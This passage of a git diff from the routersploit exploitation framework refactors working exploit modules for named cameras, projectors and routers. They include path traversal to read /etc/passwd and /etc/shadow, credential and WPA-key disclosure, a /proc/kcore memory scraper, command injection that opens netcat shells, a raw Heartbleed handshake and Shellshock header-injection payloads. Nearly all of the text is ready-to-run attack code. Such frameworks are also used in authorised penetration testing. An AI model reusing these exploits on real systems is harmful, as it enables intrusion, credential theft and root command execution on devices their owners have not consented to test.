sanitize_url("{}:{}/system.ini?loginuse&loginpas".format(self.target, self.port)) - response = http_request(method="GET", url=credential_url) + + response = self.http_request( + method="GET", + path="/system.ini?loginuse&loginpas" + ) + # Find the magic sequence "0000 0a0a 0a0a 01" - magic_sequence_location = response.content.find(b'\x00\x00\x0a\x0a\x0a\x0a\x01') + magic_sequence_location = response.content.find(b"\x00\x00\x0a\x0a\x0a\x0a\x01") + # Skip ahead by 144 bytes to the beginning of username username_location = magic_sequence_location + 144 + # Read every byte in a loop until the first '\x00' # THIS WILL NOT WORK UNDER PYTHON 3 (bytearrays return ints in py3)! username_bytes = bytearray() next_username_byte = bytes() index = username_location - while next_username_byte != b'\x00': + + while next_username_byte != b"\x00": username_bytes.append(response.content[index]) next_username_byte = response.content[index + 1] index = index + 1 @@ -1355,11 +1347,15 @@ def execute(self, cmd): @mute def check(self): - url = sanitize_url("{}:{}/system.ini?loginuse&loginpas".format(self.target, self.port)) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/system.ini?loginuse&loginpas" + ) + if response is None: return False + if response.status_code == 200 and b'\x00\x00\x0a\x0a\x0a\x0a\x01' in response.content: return True - else: - return False + + return False diff --git a/routersploit/modules/exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal.py b/routersploit/modules/exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal.py index dcf21ac83..b8f917b1b 100644 --- a/routersploit/modules/exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal.py +++ b/routersploit/modules/exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal.py @@ -1,48 +1,38 @@ -from routersploit import ( - exploits, - print_error, - print_status, - print_info, - print_success, - http_request, - mute, - validators -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for JVC IP-Camera VN-T216VPRU, Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR and Honeywell IP-Camera HICC-1100PT - Path Traversal vulnerability. If target is vulnerable it is possible to read file from the filesystem. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'JVC & Vanderbilt & Honeywell IP-Camera Path Traversal', - 'description': 'Module exploits JVC IP-Camera VN-T216VPRU, Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR and Honeywell ' - 'IP-Camera HICC-1100PT Path Traversal vulnerability. If target is vulnerable it is possible to read file ' - 'from the filesystem.', - 'authors': [ - 'Yakir Wizman', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://www.exploit-db.com/exploits/40281/', - ], - 'devices': [ - 'JVC IP-Camera VN-T216VPRU' - 'Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR', - 'Honeywell IP-Camera HICC-1100PT' - ], + "name": "JVC & Vanderbilt & Honeywell IP-Camera Path Traversal", + "description": "Module exploits JVC IP-Camera VN-T216VPRU, Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR and Honeywell " + "IP-Camera HICC-1100PT Path Traversal vulnerability. If target is vulnerable it is possible to read file " + "from the filesystem.", + "authors": ( + "Yakir Wizman", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://www.exploit-db.com/exploits/40281/", + ), + "devices": ( + "JVC IP-Camera VN-T216VPRU", + "Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR", + "Honeywell IP-Camera HICC-1100PT" + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port - - filename = exploits.Option('/etc/passwd', 'File to read from the filesystem') - - resources = ["/cgi-bin/check.cgi?file=../../..{}", - "/cgi-bin/chklogin.cgi?file=../../..{}"] + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + filename = OptString("/etc/passwd", "File to read from the filesystem") + def __init__(self): + self.resources = ( + "/cgi-bin/check.cgi?file=../../..{}", + "/cgi-bin/chklogin.cgi?file=../../..{}" + ) + self.valid_resource = None def run(self): @@ -50,9 +40,12 @@ def run(self): print_success("Target appears to be vulnerable.") path = self.valid_resource.format(self.filename) - url = "{}:{}{}".format(self.target, self.port, path) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path, + ) + if response is None: print_error("Error with reading response") return @@ -72,10 +65,12 @@ def check(self): for resource in self.resources: path = resource.format(filename) - url = "{}:{}{}".format(self.target, self.port, path) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path=path + ) - if response is not None and "root:" in response.text: + if response and utils.detect_file_content(response.text, "/etc/passwd"): self.valid_resource = resource return True # target is vulnerable diff --git a/routersploit/modules/exploits/cameras/multi/netwave_IP_camera.py b/routersploit/modules/exploits/cameras/multi/netwave_IP_camera.py deleted file mode 100644 index 50d8c128a..000000000 --- a/routersploit/modules/exploits/cameras/multi/netwave_IP_camera.py +++ /dev/null @@ -1,82 +0,0 @@ -from routersploit import ( - exploits, - print_error, - print_success, - print_info, - print_status, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Netwave IP Camera - Password Disclosure - """ - __info__ = { - 'name': 'Netwave_IP_camera', - 'description': 'This exploit will try to retrieve WPA password and ddns host name, ' - 'Also it would try to read memory leak in order to find username and password', - 'authors': [ - 'renos stoikos ', # routesploit module - 'spiritnull', # exploit-db.com exploit - ], - 'references': [ - 'https://www.exploit-db.com/exploits/41236/', - ], - 'devices': [ - 'Netwave IP Camera', - ], - } - - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(80, 'Target port', validators=validators.integer) # default port - - def run(self): - if self.check(): - print_success("Target is vulnerable") - url1 = "{}:{}//etc/RT2870STA.dat".format(self.target, self.port) - url2 = "{}:{}/get_status.cgi".format(self.target, self.port) - url3 = "{}:{}//proc/kcore".format(self.target, self.port) - - response = http_request(method="GET", url=url1) - if response is not None and "WPAPSK" in response.text: - print_success("WPA Password is in this text:") - print_info(response.text) - else: - print_error("Could not find WPA password") - - print_info("Trying to gather more info") - response = http_request(method="GET", url=url2) - if response is not None and "ddns_host" in response.text: - print_success("ddns host name:") - print_info(response.text) - else: - print_error("could not read ddns host name") - - print_status("Trying to find username and password from running memory leak") - print_status("This could take some time") - print_status("password is usually stuck next to 'admin' e.g admin123456") - response = http_request(method="GET", url=url3, stream=True) - try: - for chunk in response.iter_content(chunk_size=100): - if "admin" in chunk: - print_success(chunk) - except Exception: - print_error("Exploit failed - could not read /proc/kcore") - - @mute - def check(self): - url1 = "{}:{}//etc/RT2870STA.dat".format(self.target, self.port) - url2 = "{}:{}/get_status.cgi".format(self.target, self.port) - - check1 = http_request(method="GET", url=url1) - if check1 is not None and check1.status_code == 200 and "WPAPSK" in check1.text: - return True - - check2 = http_request(method="GET", url=url2) - if check2 is not None and check2.status_code == 200 and "ddns" in check2.text: - return True - - return False diff --git a/routersploit/modules/exploits/cameras/multi/netwave_ip_camera_information_disclosure.py b/routersploit/modules/exploits/cameras/multi/netwave_ip_camera_information_disclosure.py new file mode 100644 index 000000000..f69709c9d --- /dev/null +++ b/routersploit/modules/exploits/cameras/multi/netwave_ip_camera_information_disclosure.py @@ -0,0 +1,82 @@ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): + __info__ = { + "name": "Netwave IP Camera Information Disclosure", + "description": "This exploit will try to retrieve WPA password and ddns host name, " + "Also it would try to read memory leak in order to find username and password", + "authors": ( + "spiritnull", # exploit-db.com exploit + "renos stoikos ", # routesploit module + ), + "references": ( + "https://www.exploit-db.com/exploits/41236/", + ), + "devices": ( + "Netwave IP Camera", + ), + } + + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + def run(self): + if self.check(): + print_success("Target is vulnerable") + response = self.http_request( + method="GET", + path="//etc/RT2870STA.dat", + ) + + if response is not None and "WPAPSK" in response.text: + print_success("WPA Password is in this text:") + print_info(response.text) + else: + print_error("Could not find WPA password") + + print_info("Trying to gather more info") + response = self.http_request( + method="GET", + path="/get_status.cgi", + ) + if response is not None and "ddns_host" in response.text: + print_success("ddns host name:") + print_info(response.text) + else: + print_error("could not read ddns host name") + + print_status("Trying to find username and password from running memory leak") + print_status("This could take some time") + print_status("password is usually stuck next to 'admin' e.g admin123456") + response = self.http_request( + method="GET", + path="//proc/kcore", + stream=True + ) + try: + for chunk in response.iter_content(chunk_size=100): + if "admin" in chunk: + print_success(chunk) + except: + print_error("Exploit failed - could not read /proc/kcore") + + @mute + def check(self): + check1 = self.http_request( + method="GET", + path="//etc/RT2870STA.dat", + ) + if check1 is not None and check1.status_code == 200 and "WPAPSK" in check1.text: + return True + + check2 = self.http_request( + method="GET", + path="/get_status.cgi", + ) + + if check2 is not None and check2.status_code == 200 and "ddns" in check2.text: + return True + + return False diff --git a/routersploit/modules/exploits/cameras/siemens/CVMS2025_credentials_disclosure.py b/routersploit/modules/exploits/cameras/siemens/CVMS2025_credentials_disclosure.py index 0b20b7f7b..2f7322a4e 100644 --- a/routersploit/modules/exploits/cameras/siemens/CVMS2025_credentials_disclosure.py +++ b/routersploit/modules/exploits/cameras/siemens/CVMS2025_credentials_disclosure.py @@ -1,39 +1,27 @@ -from routersploit import ( - exploits, - print_error, - print_info, - print_success, - http_request, - mute, - validators -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for SIEMENS IP-Camera CCMS2025 Password Dislosure vulnerability. - If target is vulnerable it is possible to read administative credentials. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'SIEMENS IP-Camera CCMS2025 Password Disclosure', - 'description': 'Module exploits SIEMENS IP-Camera CCMS2025 Password Dislosure vulnerability. If target is vulnerable ' - 'it is possible to read administrative credentials', - 'authors': [ - 'Yakir Wizman', # vulnerability discovery - 'VegetableCat ', # routersploit module - ], - 'references': [ - 'https://www.exploit-db.com/exploits/40254/', - ], - 'devices': [ - 'SIEMENS IP-Camera CVMS2025-IR', - 'SIEMENS IP-Camera CCMS2025', - ], + "name": "SIEMENS IP-Camera CCMS2025 Password Disclosure", + "description": "Module exploits SIEMENS IP-Camera CCMS2025 Password Dislosure vulnerability. If target is vulnerable " + "it is possible to read administrative credentials", + "authors": ( + "Yakir Wizman", # vulnerability discovery + "VegetableCat ", # routersploit module + ), + "references": ( + "https://www.exploit-db.com/exploits/40254/", + ), + "devices": ( + "SIEMENS IP-Camera CVMS2025-IR", + "SIEMENS IP-Camera CCMS2025", + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', - validators=validators.url) # target address - port = exploits.Option(80, 'Target port') # default port + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def __init__(self): self.content = None @@ -42,17 +30,18 @@ def run(self): if self.check(): print_success("Target seems to be vulnerable") print_info(self.content) - print_info("please login at:") - print_info("{}:{}/cgi-bin/chklogin.cgi".format(self.target, self.port)) + print_info("Please login at: {}".format(self.get_target_url(path="/cgi-bin/chklogin.cgi"))) else: print_error("Exploit failed - target seems to be not vulnerable") @mute def check(self): - url = "{}:{}/cgi-bin/readfile.cgi?query=ADMINID".format(self.target, self.port) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/cgi-bin/readfile.cgi?query=ADMINID" + ) - if response is not None and "Adm_ID" in response.text: + if response and "Adm_ID" in response.text: self.content = response.text return True # target is vulnerable diff --git a/routersploit/modules/exploits/cameras/videoiq/videoiq_camera_path_traversal.py b/routersploit/modules/exploits/cameras/videoiq/videoiq_camera_path_traversal.py deleted file mode 100644 index 7b565fe03..000000000 --- a/routersploit/modules/exploits/cameras/videoiq/videoiq_camera_path_traversal.py +++ /dev/null @@ -1,72 +0,0 @@ -from routersploit import ( - exploits, - print_error, - print_info, - print_success, - print_status, - http_request, - mute, - validators -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for VideoIQ Camera Path Traversal vulnerability. - If target is vulnerable it is possible to read file from the file system. - """ - __info__ = { - 'name': 'VideoIQ Camera Path Traversal', - 'description': 'Module exploits VideoIQ Camera Path Traversal vulnerability. If target is vulnerable ' - 'it is possible to read file from file system.', - 'authors': [ - 'Yakir Wizman', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://www.exploit-db.com/exploits/40284/', - ], - 'devices': [ - 'VideoIQ Camera', - ], - } - - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address - port = exploits.Option(8080, 'Target port', validators=validators.integer) # default port - - filename = exploits.Option('/etc/passwd', 'File to read from file system') - - def run(self): - if self.check(): - print_success("Target seems to be vulnerable") - - url = "{}:{}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C..{}" \ - .format(self.target, self.port, self.filename) - - response = http_request(method="GET", url=url) - if response is None: - print_error("Exploit failed - could not read response") - return - - print_status("Trying to read file: {}".format(self.filename)) - if any(err in response.text for err in ['Error 404 NOT_FOUND', 'Problem accessing', 'HTTP ERROR 404']): - print_status("File does not exist: {}".format(self.filename)) - return - - if response.text: - print_info(response.text) - else: - print_status("File seems to be empty") - else: - print_error("Exploit failed - target seems to be not vulnerable") - - @mute - def check(self): - url = "{}:{}/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd" \ - .format(self.target, self.port) - - response = http_request(method="GET", url=url) - if response is not None and "root:" in response.text: - return True # target is vulnerable - - return False # target is not vulnerable diff --git a/routersploit/modules/exploits/misc/asus/b1m_projector_rce.py b/routersploit/modules/exploits/misc/asus/b1m_projector_rce.py index 5152a79a7..07c481147 100644 --- a/routersploit/modules/exploits/misc/asus/b1m_projector_rce.py +++ b/routersploit/modules/exploits/misc/asus/b1m_projector_rce.py @@ -1,38 +1,26 @@ -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - http_request, - mute, - validators, - shell -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Asus B1M Projector Remote Code Execution vulnerability. - If the target is vulnerable, command loop is invoked that allows executing commands with root privileges. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'Asus B1M Projector RCE', - 'description': 'Module exploits Asus B1M Projector Remote Code Execution vulnerability which ' - 'allows executing command on operating system level with root privileges.', - 'authors': [ - 'Hacker House ', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://www.myhackerhouse.com/asus-b1m-projector-remote-root-0day/', - ], - 'devices': [ - 'Asus B1M Projector', - ], + "name": "Asus B1M Projector RCE", + "description": "Module exploits Asus B1M Projector Remote Code Execution vulnerability which " + "allows executing command on operating system level with root privileges.", + "authors": ( + "Hacker House ", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://www.myhackerhouse.com/asus-b1m-projector-remote-root-0day/", + ), + "devices": ( + "Asus B1M Projector", + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port', validators=validators.integer) + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): @@ -43,10 +31,13 @@ def run(self): print_error("Target is not vulnerable") def execute(self, cmd): - """ callback used by shell functionality """ - url = "{}:{}/cgi-bin/apply.cgi?ssid=\"%20\"`{}`".format(self.target, self.port, cmd) + path = "/cgi-bin/apply.cgi?ssid=\"%20\"`{}`".format(cmd) + + response = self.http_request( + method="GET", + path=path + ) - response = http_request(method="GET", url=url) if response is None: return "" @@ -57,7 +48,7 @@ def check(self): cmd = "cat /etc/shadow" response_text = self.execute(cmd) - if "root:" in response_text: + if utils.detect_file_content(response_text, "/etc/shadow"): return True # target is vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/misc/miele/pg8528_path_traversal.py b/routersploit/modules/exploits/misc/miele/pg8528_path_traversal.py index 84ee52f56..2563b4731 100644 --- a/routersploit/modules/exploits/misc/miele/pg8528_path_traversal.py +++ b/routersploit/modules/exploits/misc/miele/pg8528_path_traversal.py @@ -1,45 +1,39 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_info, - http_request, - mute, - validators, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Miele Professional PG 8528 Path Traversal vulnerability. - If the target is vulnerable, content of the specified file is returned. - """ +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): __info__ = { - 'name': 'Miele Professional PG 8528 Path Traversal', - 'description': 'Module exploits Miele Professional PG 8528 Path Traversal vulnerability which allows ' - 'to read any file on the system.', - 'authors': [ - 'Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7240', - 'https://www.exploit-db.com/exploits/41718/', - ], - 'devices': [ - 'Miele Professional PG 8528 PST10' - ], + "name": "Miele Professional PG 8528 Path Traversal", + "description": "Module exploits Miele Professional PG 8528 Path Traversal vulnerability which allows " + "to read any file on the system.", + "authors": ( + "Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7240", + "https://www.exploit-db.com/exploits/41718/", + ), + "devices": ( + "Miele Professional PG 8528 PST10", + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port') - filename = exploits.Option('/etc/shadow', 'File to read') + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + filename = OptString("/etc/shadow", "File to read from filesystem") def run(self): if self.check(): - url = "{}:{}/../../../../../../../../../../../..{}".format(self.target, self.port, self.filename) + path = "/../../../../../../../../../../../..{}".format(self.filename) + + response = self.http_request( + method="GET", + path=path + ) - response = http_request(method="GET", url=url) if response is None: return @@ -53,11 +47,12 @@ def run(self): @mute def check(self): - url = "{}:{}/../../../../../../../../../../../../etc/shadow".format(self.target, self.port) - - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/../../../../../../../../../../../../etc/shadow" + ) - if response is not None and "root:" in response.text: + if response and utils.detect_file_content(response.text, "/etc/shadow"): return True # target vulnerable return False # target is not vulnerable diff --git a/routersploit/modules/exploits/misc/wepresent/wipg1000_rce.py b/routersploit/modules/exploits/misc/wepresent/wipg1000_rce.py index ba4e4c81a..d5577118e 100644 --- a/routersploit/modules/exploits/misc/wepresent/wipg1000_rce.py +++ b/routersploit/modules/exploits/misc/wepresent/wipg1000_rce.py @@ -1,67 +1,57 @@ -from routersploit import ( - exploits, - print_success, - print_error, - print_status, - http_request, - mute, - validators, - shell, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for WePresent WiPG-1000 Command Injection vulnerability. - If the target is vulnerable, it is possible to execute commands on operating system level. - """ +class Exploit(HTTPClient): __info__ = { - 'name': 'WePresent WiPG-1000 RCE', - 'description': 'Module exploits WePresent WiPG-1000 Command Injection vulnerability which allows ' - 'executing commands on operating system level.', - 'authors': [ - 'Matthias Brun', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt', - ], - 'devices': [ - 'WePresent WiPG-1000 <=2.0.0.7', - ], + "name": "WePresent WiPG-1000 RCE", + "description": "Module exploits WePresent WiPG-1000 Command Injection vulnerability which allows " + "executing commands on operating system level.", + "authors": ( + "Matthias Brun", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://www.redguard.ch/advisories/wepresent-wipg1000.txt", + ), + "devices": ( + "WePresent WiPG-1000 <=2.0.0.7", + ), } - target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) - port = exploits.Option(80, 'Target Port', validators=validators.integer) + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") def run(self): if self.check(): print_success("Target seems to be vulnerable") print_status("This is blind command injection, response is not available") - shell(self, - architecture="generic", - method="netcat", - payloads=["netcat_bind_tcp", "netcat_reverse_tcp"]) + shell(self, architecture="mipsbe", binary="netcat", shell="/bin/sh") else: print_error("Exploit failed - exploit seems to be not vulnerable") def execute(self, cmd): - """ callback used by shell functionality """ payload = ";{};".format(cmd) - url = "{}:{}/cgi-bin/rdfs.cgi".format(self.target, self.port) data = { "Client": payload, "Download": "Download" } - http_request(method="POST", url=url, data=data) + self.http_request( + method="POST", + path="/cgi-bin/rdfs.cgi", + data=data + ) + return "" @mute def check(self): - url = "{}:{}/cgi-bin/rdfs.cgi".format(self.target, self.port) - response = http_request(method="GET", url=url) + response = self.http_request( + method="GET", + path="/cgi-bin/rdfs.cgi" + ) if response is not None and "Follow administrator instructions to enter the complete path" in response.text: return True # target vulnerable diff --git a/routersploit/modules/exploits/multi/__init__.py b/routersploit/modules/exploits/multi/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/routersploit/modules/exploits/routers/multi/heartbleed.py b/routersploit/modules/exploits/multi/heartbleed.py similarity index 74% rename from routersploit/modules/exploits/routers/multi/heartbleed.py rename to routersploit/modules/exploits/multi/heartbleed.py index c640b2abf..9602119f7 100644 --- a/routersploit/modules/exploits/routers/multi/heartbleed.py +++ b/routersploit/modules/exploits/multi/heartbleed.py @@ -1,29 +1,20 @@ +import binascii +import select import socket import struct import time -import select +from routersploit.core.exploit import * +from routersploit.core.tcp.tcp_client import TCPClient +from future.builtins import range + -from routersploit import ( - exploits, - print_status, - print_error, - print_success, - print_info, - mute, -) - - -class Exploit(exploits.Exploit): - """ - Exploit implementation for Hearbleed vulnerability. - If the target is vulnerable it allows to execute command on operating system level." - """ +class Exploit(TCPClient): __info__ = { 'name': 'Heartbleed', 'description': 'Exploits Hearbleed vulnerability.', 'authors': [ 'Jared Stafford ', # proof of concept python exploit - 'Marcin Bury ', # routersploit module + 'Marcin Bury ', # routersploit module ], 'references': [ 'http://www.cvedetails.com/cve/2014-0160', @@ -36,42 +27,44 @@ class Exploit(exploits.Exploit): ], } - target = exploits.Option('', 'Target IP address e.g. 192.168.1.1') # target address - port = exploits.Option(443, 'Target port') # default port - - hello = ''' - 16 03 02 00 dc 01 00 00 d8 03 02 53 - 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf - bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 - 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 - 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c - c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 - c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 - c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c - c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 - 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 - 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 - 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 - 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 - 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 - 00 0f 00 01 01 - ''' - - hb = ''' - 18 03 02 00 03 - 01 40 00 - ''' + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(443, "Target HTTP port") + ssl = OptBool("SSL enabled: true/false") + + def __init__(self): + self.hello = ''' + 16 03 02 00 dc 01 00 00 d8 03 02 53 + 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf + bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 + 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 + 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c + c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 + c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 + c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c + c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 + 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 + 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 + 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 + 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 + 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 + 00 0f 00 01 01 + ''' + + self.hb = ''' + 18 03 02 00 03 + 01 40 00 + ''' def h2bin(self, x): - return x.replace(' ', '').replace('\n', '').decode('hex') + return binascii.unhexlify(x.replace(' ', '').replace('\n', '')) def hexdump(self, s): - for b in xrange(0, len(s), 16): + for b in range(0, len(s), 16): lin = [c for c in s[b: b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.')for c in lin) print_info(' %04x: %-48s %s' % (b, hxdat, pdat)) - print + print_info() def recvall(self, s, length, timeout=5): endtime = time.time() + timeout @@ -132,11 +125,9 @@ def hit_hb(self, s): def run(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.settimeout(10.0) - s.connect((self.target, int(self.port))) s.send(self.h2bin(self.hello)) - except Exception: + except: print_error("Connection failed: {}:{}".format(self.target, self.port)) return @@ -159,8 +150,6 @@ def run(self): def check(self): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.settimeout(10.0) - s.connect((self.target, int(self.port))) s.send(self.h2bin(self.hello)) except socket.error: diff --git a/routersploit/modules/exploits/multi/shellshock.py b/routersploit/modules/exploits/multi/shellshock.py new file mode 100644 index 000000000..308fc17a7 --- /dev/null +++ b/routersploit/modules/exploits/multi/shellshock.py @@ -0,0 +1,100 @@ +import re +import string +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient + + +class Exploit(HTTPClient): + __info__ = { + "name": "Shellshock", + "description": "Exploits shellshock vulnerability that allows executing commands on operating system level.", + "authors": [ + "Marcin Bury ", # routersploit module + ], + "references": [ + "https://access.redhat.com/articles/1200223", + "http://seclists.org/oss-sec/2014/q3/649", + "http://blog.trendmicro.com/trendlabs-security-intelligence/shell-attack-on-your-server-bash-bug-cve-2014-7169-and-cve-2014-6271/", + ], + "devices": [ + "Multi", + ], + } + target = OptIP("", "Target IPv4 or IPv6 address") + port = OptPort(80, "Target HTTP port") + + path = OptString("/", "Url path") + method = OptString("GET", "HTTP method") + header = OptString("User-Agent", "HTTP header injection point") + + def __init__(self): + self.payloads = [ + '() { :;};echo -e "\\r\\n{{marker}}$(/bin/bash -c "{{cmd}}"){{marker}}"', # cve-2014-6271 + '() { _; } >_[$($())] { echo -e "\\r\\n{{marker}}$(/bin/bash -c "{{cmd}}"){{marker}}"; }', # cve-2014-6278 + ] + self.valid = None + + def run(self): + if self.check(): + print_success("Target is vulnerable") + print_status("Invoking command loop...") + shell(self) + else: + print_error("Target is not vulnerable") + + def execute(self, cmd): + marker = utils.random_text(32) + + url = "{}:{}{}".format(self.target, self.port, self.path) + injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd) + + headers = { + self.header: injection, + } + + response = self.http_request( + method=self.method, + path=self.path, + headers=headers + ) + + if response is None: + return + + regexp = "{}(.+?){}".format(marker, marker) + res = re.findall(regexp, response.text, re.DOTALL) + + if len(res): + return res[0] + else: + return "" + + @mute + def check(self): + number = int(utils.random_text(6, alph=string.digits)) + solution = number - 1 + cmd = "echo $(({}-1))".format(number) + + marker = utils.random_text(32) + url = "{}:{}{}".format(self.target, self.port, self.path) + + for payload in self.payloads: + injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd) + + headers = { + self.header: injection, + } + + response = self.http_request( + method=self.method, + path=self.path, + headers=headers + ) + if response is None: + continue + + if str(solution) in response.text: + self.valid = payload + return True # target is vulnerable + + return False # target not vulnerable diff --git a/routersploit/modules/exploits/routers/2wire/4011g_5012nv_path_traversal.py b/routersploit/modules/exploits/routers/2wire/4011g_5012nv_path_traversal.py index c3b611741..e6dc1c4ad 100644 --- a/routersploit/modules/exploits/routers/2wire/4011g_5012nv_path_traversal.py +++ b/routersploit/modules/exploits/routers/2wire/4011g_5012nv_path_traversal.py @@ -1,56 +1,51 @@ -from routersploit import ( - exploits, - print_success, - print_status, - print_error, - print_info, - http_request, - mute, - validators, -) +from routersploit.core.exploit import * +from routersploit.core.http.http_client import HTTPClient -class Exploit(exploits.Exploit): - """ - Exploit implementation for path traversal vulnerability in 2Wire 4011G and 5012NV devices. - If the target is vulnerable it is possible to read file from the filesystem." - """ +class Exploit(HTTPClient): __info__ = { - 'name': '2Wire 4011G & 5012NV Path Traversal', - 'description': 'Module exploits path traversal vulnerability in 2Wire 4011G and 5012NV devices. ' - 'If the target is vulnerable it is possible to read file from the filesystem.', - 'authors': [ - 'adiaz', # vulnerability discovery - 'Marcin Bury ', # routersploit module - ], - 'references': [ - 'https://www.underground.org.mx/index.php?topic=28616.0', - ], - 'devices': [ - '2Wire 4011G', - '2Wire 5012NV', - ], + "name": "2Wire 4011G & 5012NV Path Traversal", + "description": "Module exploits path traversal vulnerability in 2Wire 4011G and 5012NV devices. " + "If the target is vulnerable it is possible to read file from the filesystem.", + "authors": ( + "adiaz", # vulnerability discovery + "Marcin Bury ", # routersploit module + ), + "references": ( + "https://www.underground.org.mx/index.php?topic=28616.0", + ), + "devices": ( + "2Wire 4011G", + "2Wire 5012NV", + ), } - target = 